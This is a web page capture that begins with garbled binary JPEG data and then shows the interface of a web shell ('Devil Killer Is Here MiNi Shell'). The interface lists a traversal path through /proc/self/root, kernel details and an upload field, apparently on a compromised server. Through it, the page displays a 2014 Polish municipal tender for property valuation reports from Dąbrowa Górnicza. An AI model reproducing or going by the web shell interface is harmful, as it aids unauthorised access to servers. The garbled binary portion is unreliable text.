JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140130/19517-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Wykonanie operatów szacunkowych</b><br>
<b>Numer ogłoszenia: 19517 - 2014; data zamieszczenia: 30.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie operatów szacunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwoty dla dostaw i usług określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013r., poz. 907 z późn. zm.).
1. Opis przedmiotu zamówienia
1.1. Przedmiot zamówienia obejmuje: 
1. Wykonanie operatów szacunkowych określających wartość 1 m2 nieruchomości składającej się z pojedynczej działki, niezależnie od ilości jej przeznaczeń 
w miejscowym planie zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania przestrzennego.
2. Wykonanie operatów szacunkowych określających wartość 1 m2 nieruchomości składającej się z wielu działek stanowiących całość gospodarczą (kompleks działek), niezależnie od ilości jej przeznaczeń w miejscowym planie zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania przestrzennego.
3. Wykonanie operatów szacunkowych zawierających wycenę składnika budowlanego - budynki mieszkalne i użytkowe o powierzchni użytkowej do 300 m2.
4. Wykonanie operatów szacunkowych zawierających wycenę składnika budowlanego - budynki mieszkalne i użytkowe o powierzchni użytkowej od 300 - 1000 m2.
5. Wykonanie operatów szacunkowych zawierających wycenę składnika budowlanego - budynki mieszkalne i użytkowe o powierzchni użytkowej powyżej 1000 m2.
6. Wykonanie operatów szacunkowych zawierających wycenę składnika budowlanego -urządzenia i budowle.
7. Wykonanie operatów szacunkowych nieruchomości oddanych w użytkowanie wieczyste, ustalających należność z tytułu przekształcenia prawa użytkowania wieczystego w prawo własności lub zbycia tego prawa na własność.
8. Wykonanie operatów szacunkowych zawierających wycenę nieruchomości w celu ustalenia opłaty adiacenckiej i renty planistycznej.
9. Wykonanie operatów szacunkowych zawierających wycenę nieruchomości w celu zwrotu na rzecz byłych właścicieli oraz ustalenia odszkodowania za wywłaszczoną nieruchomość.
10. Wykonanie operatów szacunkowych ustalających odszkodowanie za nieruchomości, które przeszły na własność Skarbu Państwa lub jednostek samorządu terytorialnego z mocy prawa.
11. Wykonanie operatów szacunkowych określających odszkodowanie za ograniczenie sposobu korzystania z nieruchomości oraz szkody powstałe na skutek czynności, o których mowa w art. 124 - 125 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami /tekst jednolity Dz.U. z 2010 r. Nr 102, poz. 651 z późn. zm./.
12. Wykonanie operatów szacunkowych określających odszkodowanie 
za udostępnienie nieruchomości oraz szkody powstałe w wyniku zajęcia nieruchomości w trybie art. 126 ust. 1ustawy o gospodarce nieruchomościami.
13. Wykonanie operatów szacunkowych określających wartość nieruchomości 
z uwzględnieniem poniesionych na nią nakładów.
14. Wykonanie operatów szacunkowych określających rynkową stawkę czynszu najmu nieruchomości.
15. Wykonanie operatów szacunkowych określających wartość 1 m2 nieruchomości dla potrzeb aktualizacji/ustalania opłat rocznych, niezależnie od ilości jej przeznaczeń w miejscowym planie zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania przestrzennego.
16. Wykonanie operatów szacunkowych określających wartość nakładów poniesionych przez użytkownika wieczystego lub trwałego zarządcę podlegających zaliczeniu 
w toku aktualizacji opłat rocznych.
17. Wykonanie operatów szacunkowych określających wartość rynkową ograniczonego prawa rzeczowego.
18. Wykonanie operatów szacunkowych ustalających wynagrodzenie za bezumowne korzystanie z nieruchomości.
19. Wykonanie opinii o braku wzrostu wartości nieruchomości w związku 
z uchwaleniem lub zmianą miejscowego planu zagospodarowania przestrzennego, z tytułu podziału nieruchomości oraz z tytułu wybudowania urządzeń infrastruktury technicznej.
20. Wykonanie operatów szacunkowych dot. wyceny lokali mieszkalnych wraz 
z określeniem wartości przynależnego gruntu w celu ich zbycia.
21. Wykonanie operatów szacunkowych dot. wyceny lokali użytkowych wraz 
z określeniem wartości przynależnego gruntu w celu ich zbycia.

1.2. Warunki realizacji zamówienia:
1. Operat szacunkowy należy wykonać w formie pisemnej, zgodnie ze stanem faktycznym 
i prawnym nieruchomości.
2. Wykonawca zobowiązany jest stosować przepisy prawa i standardy zawodowe, kierować się zasadami etyki zawodowej i wykonywać czynności ze szczególną starannością.
3. Wykonanie potrzebnej dokumentacji szacunkowej przez Wykonawcę nastąpi każdorazowo na podstawie odrębnego zlecenia pisemnego otrzymanego od Zamawiającego, w siedzibie Zamawiającego, tj. Urząd Miejski, ul. Graniczna 21, 41-300 Dąbrowa Górnicza.
4. Wykonawca zobowiązany jest stawić się w siedzibie Zamawiającego na każde żądanie telefoniczne lub pisemne, co najmniej raz w tygodniu.
5. Wykonawca nie może odmówić odbioru zlecenia. Odmowa odbioru zlecenia przez Wykonawcę może skutkować rozwiązaniem umowy z przyczyn leżących wyłącznie po stronie Wykonawcy.
6. Termin realizacji zlecenia przez Wykonawcę będzie wskazany przez Zamawiającego w poszczególnym zleceniu i będzie wynosił od 3 do 15 dni.
7. W jednym zleceniu Zamawiający może ująć wykonanie od 1 do 20 operatów.
8. W przypadku konieczności zawiadamiania stron o wizji w terenie, termin realizacji będzie odrębny - ustalony w zleceniu.Wykonawca zorganizuje wizję w terenie we własnym zakresie.
9. Wykonawca do każdego operatu szacunkowego zobowiązany będzie dostarczyć, niżej wskazane dokumenty:
- protokół z badania księgi wieczystej - dotyczy zadań, o których mowa w pkt 3.3.1, ppkt 1 - 21 SIWZ.
- dokumentację fotograficzną - dotyczy zadań, o których mowa w pkt 3.3.1, ppkt  1 - 18 i ppkt  20 - 21 SIWZ.
- rzut wycenianego lokalu i pomieszczeń przynależnych na odpowiednich poziomach budynku - dotyczy zadań, o których mowa w pkt 3.3.1, ppkt  20 - 21 SIWZ.
10. Zamawiający w celu wykonania przedmiotu zamówienia dostarczy Wykonawcy: wypis z rejestru gruntów, zaświadczenie o przeznaczeniu w miejscowym planie zagospodarowania przestrzennego miasta, a w przypadku braku obowiązującego planu, o przeznaczeniu przedmiotowej nieruchomości w studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta oraz mapę.
11. Wykonawca zweryfikuje aktualność informacji wynikających z dokumentów otrzymanych od Zamawiającego, o których mowa w pkt. 3.3.2.  ppkt. 8 SIWZ we właściwym sądzie rejonowym lub urzędzie. Potwierdzeniem dokonania powyższych czynności winna być pisemna notatka rzeczoznawcy majątkowego dołączona do operatu szacunkowego.
12. W przypadku braku możliwości dostarczenia przez Zamawiającego dokumentów, o których mowa w pkt. 3.3.2.  ppkt. 8 SIWZ, Wykonawca zobowiązany będzie do ich uzyskania we własnym zakresie. Z tego tytułu Wykonawcy nie przysługuje żadne roszczenie finansowe.
13. Zgromadzenie pozostałych materiałów niezbędnych do wykonania przedmiotu umowy, a niebędących w posiadaniu Zamawiającego, należy do Wykonawcy. Z tego tytułu Wykonawcy nie przysługuje żadne roszczenie finansowe.
14. W przypadku wykonania operatów szacunkowych określających wartość 1 m2 nieruchomości dla potrzeb aktualizacji opłat rocznych Wykonawca zobowiązany będzie określić cel oddania nieruchomości w użytkowanie wieczyste dokonując wglądu w akta księgi wieczystej.
15. Po wykonaniu operatów szacunkowych określających wartość 1 m2 nieruchomości dla potrzeb aktualizacji opłat rocznych, w przypadku zgłoszenia żądania przekształcenia prawa użytkowania wieczystego w prawo własności, Wykonawca zobowiązany będzie do sporządzenia, w oparciu o te operaty, wycen określających opłatę z tytułu przekształcenia. Z tego tytułu Wykonawcy nie przysługuje żadne roszczenie finansowe. 
16. W przypadku wykonania operatów szacunkowych, o których mowa w pkt. 3.3.1.  ppkt. 10  SIWZ za przejęcie nieruchomości pod drogi w trybie tzw. specustawy drogowej, przysługujących właścicielowi nieruchomości, użytkownikowi wieczystemu oraz osobom, którym przysługuje do nieruchomości ograniczone prawo rzeczowe, przyjęcie do wykonania I etapu zadania polegającego na dokonaniu oględzin nieruchomości celem sporządzenia protokołu, inwentaryzacji wraz z dokumentacją fotograficzną - na żądanie zamawiającego zgłoszone telefonicznie, mailem lub faxem, nie później niż na 15 godzin przed obowiązkiem dokonania oględzin, w miejscu i czasie wskazanym przez Zamawiającego.
17. Wykonawca w ramach wynagrodzenia (jeżeli cena nieruchomości nie uległa zmianie), na wezwanie Zamawiającego, zobowiązuje się do sporządzenia klauzuli aktualności do operatów szacunkowych w okresie do 1 roku od sporządzenia operatu szacunkowego.
18. Wykonawca zobowiązany jest do sporządzenia nowej wyceny w przypadku stwierdzenia, iż wartość nieruchomości przedstawiona w operacie szacunkowym uległa zmianie przed upływem 12 miesięcy od daty jego sporządzenia - z tego tytułu Wykonawcy nie przysługuje żadne roszczenie finansowe.
19. Zamówienie wykonywane będzie po zadeklarowanych przez Wykonawcę cenach jednostkowych do wysokości maksymalnej nominalnej wartości umowy.
20. W przypadku gdyby decyzją organów Gminy lub z innych przyczyn niezależnych od Zamawiającego, nastąpiło obniżenie wysokości posiadanych środków, nie może to stanowić podstawy do rozwiązania umowy przez Wykonawcę z winy Zamawiającego ani żądania kary umownej czy też naprawienia szkody. 
1.3. Informacja o ilości zleconych operatów w 2013 r.:
1. Wykonanie pojedynczego operatu szacunkowego określającego wartość 1 m2 gruntu pojedynczej działki, niezależnie od ilości jej przeznaczeń w miejscowym planie zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania przestrzennego:
ilość zleconych operatów w 2013 roku:     32 szt.
2. Wykonanie pojedynczego operatu szacunkowego określającego wartość 1 m2 nieruchomości składającej się z wielu działek geodezyjnych stanowiących całość gospodarczą (kompleks działek), niezależnie od ilości jej przeznaczeń 
w miejscowym planie zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania przestrzennego:
ilość zleconych operatów w 2013 roku:     31 szt.
3. Wykonanie pojedynczego operatu szacunkowego zawierającego wycenę składnika budowlanego - budynki mieszkalne i użytkowe o powierzchni użytkowej do 300 m2:
ilość zleconych operatów w 2013 roku:     24 szt.
4. Wykonanie pojedynczego operatu szacunkowego zawierającego wycenę składnika budowlanego - budynki mieszkalne i użytkowe o powierzchni użytkowej od 300 - 1000 m2:
ilość zleconych operatów w 2013 roku:    12 szt.
5. Wykonanie pojedynczego operatu szacunkowego zawierającego wycenę składnika budowlanego - budynki mieszkalne i użytkowe o powierzchni użytkowej powyżej 1000 m2:
ilość zleconych operatów w 2013 roku:     6szt.
6. Wykonanie pojedynczego operatu szacunkowego zawierającego wycenę składnika budowlanego - urządzenia i budowle:
ilość zleconych operatów w 2013 roku:      27 szt.
7. Wykonanie pojedynczego operatu szacunkowego nieruchomości oddanych w użytkowanie wieczyste, ustalającego opłaty z tytułu przekształcenia prawa użytkowania wieczystego w prawo własności:
ilość zleconych operatów w 2013 roku:     33 szt.
8. Wykonanie pojedynczego operatu szacunkowego zawierającego wycenę nieruchomości w celu ustalenia opłaty adiacenckiej i renty planistycznej:
ilość zleconych operatów w 2013 roku:    45 szt. 
9. Wykonanie pojedynczego operatu szacunkowego zawierającego wycenę nieruchomości w celu zwrotu na rzecz byłych właścicieli oraz ustalenia odszkodowania za wywłaszczoną nieruchomość:
ilość zleconych operatów w 2013 roku:      7 szt.
10. Wykonanie pojedynczego operatu szacunkowego ustalającego odszkodowanie za nieruchomości, które przeszły na własność Skarbu Państwa lub jednostek samorządu terytorialnego z mocy prawa:
ilość zleconych operatów w 2013 roku:    13 szt.
11. Wykonanie pojedynczego operatu szacunkowego określającego odszkodowanie za ograniczenie sposobu korzystania z nieruchomości oraz szkody powstałe na skutek czynności, o których mowa w art. 124 - 125 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami /tekst jednolity Dz.U. z 2010 r. Nr 102, poz. 651 z późn. zm./.  
ilość zleconych operatów w 2013 roku:     0 szt.
12. Wykonanie pojedynczego operatu szacunkowego określającego odszkodowanie za udostępnienie nieruchomości oraz szkody powstałe w wyniku zajęcia nieruchomości w trybie art. 126 ust. 1ustawy o gospodarce nieruchomościami. 
ilość zleconych operatów w 2013 roku:     0 szt.
13. Wykonanie pojedynczego operatu szacunkowego określającego wartość nieruchomości uwzględnieniem poniesionych na nią nakładów:
     ilość zleconych operatów w 2013 roku:     1 szt.
14. Wykonanie pojedynczego operatu szacunkowego określającego rynkową stawkę czynszu najmu nieruchomości:
ilość zleconych operatów w 2013 roku:     12 szt.
15. Wykonanie pojedynczego operatu szacunkowego określającego wartość 1 m2 nieruchomości gruntowej dla potrzeb aktualizacji opłat rocznych, niezależnie od ilości jej przeznaczeń w miejscowym planie zagospodarowania przestrzennego lub studium uwarunkowań kierunków zagospodarowania przestrzennego:
ilość zleconych operatów w 2013 roku:    118 szt.
16. Wykonanie pojedynczego operatu szacunkowego określającego wartość nakładów poniesionych przez użytkownika wieczystego lub trwałego zarządcę podlegających zaliczeniu w toku aktualizacji opłat rocznych:
ilość zleconych operatów w 2013 roku:     0 szt.
17. Wykonanie pojedynczego operatu szacunkowego określającego wartość rynkową ograniczonego prawa rzeczowego:
ilość zleconych operatów w 2013 roku:     14 szt.
18. Wykonanie pojedynczego operatu szacunkowego ustalającego wynagrodzenie za bezumowne korzystanie z nieruchomości:
ilość zleconych operatów w 2013 roku:     4 szt.
19. Wykonanie pojedynczej opinii o braku wzrostu wartości nieruchomości w związku z uchwaleniem lub zmianą miejscowego planu zagospodarowania przestrzennego, z tytułu podziału nieruchomości oraz z tytułu wybudowania urządzeń infrastruktury technicznej:
ilość zleconych operatów w 2013 roku:    64 szt.
20. Wykonanie pojedynczego operatu szacunkowego dot. wyceny lokali mieszkalnych wraz z określeniem wartości przynależnego gruntu w celu ich zbycia:
ilość zleconych operatów w 2013 roku:    135 szt.
21. Wykonanie pojedynczego operatu szacunkowego dot. wyceny lokali użytkowych wraz z określeniem wartości przynależnego gruntu w celu ich zbycia:
ilość zleconych operatów w 2013 roku:       3 szt.

Uwaga:
Wykonawcy nie służy roszczenie o wykonanie poszczególnych operatów szacunkowych w ilościach podanych w pkt. 3.3.3. SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego. 
 Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym przedmiotem zamówienia. 
Wartość szacunkowa zamówień uzupełniających wyniesie nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust.1 ustawy (załącznik nr  4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (lub wykonuje) jedną usługę polegającą na wykonywaniu operatów szacunkowych dla jednostki samorządu terytorialnego o łącznej wartości operatów szacunkowych nie mniejszej niż 60 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust.1 ustawy (załącznik nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże,  że dysponuje osobą posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości wydane na podstawie ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (tekst jedn. Dz. U. z 2010r. Nr 102, poz. 651 z późn. zm.) lub odpowiadające im ważne uprawnienia ww. zakresie, które zostały wydane na podstawie  wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust.1 ustawy (załącznik nr 4 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy usług pozwalających wykazać, iż Wykonawca spełnia warunek określony w sekcji III.3.2) ogłoszenia o zamówieniu, tj.  wykonał (lub wykonuje) jedną usługę polegającą na wykonywaniu operatów szacunkowych dla jednostki samorządu terytorialnego o łącznej wartości operatów szacunkowych nie mniejszej niż 60 000,00 zł brutto. 
W wykazie nie należy podawać informacji o usługach/dostawach niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 ustawy Pzp (zdanie 2).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
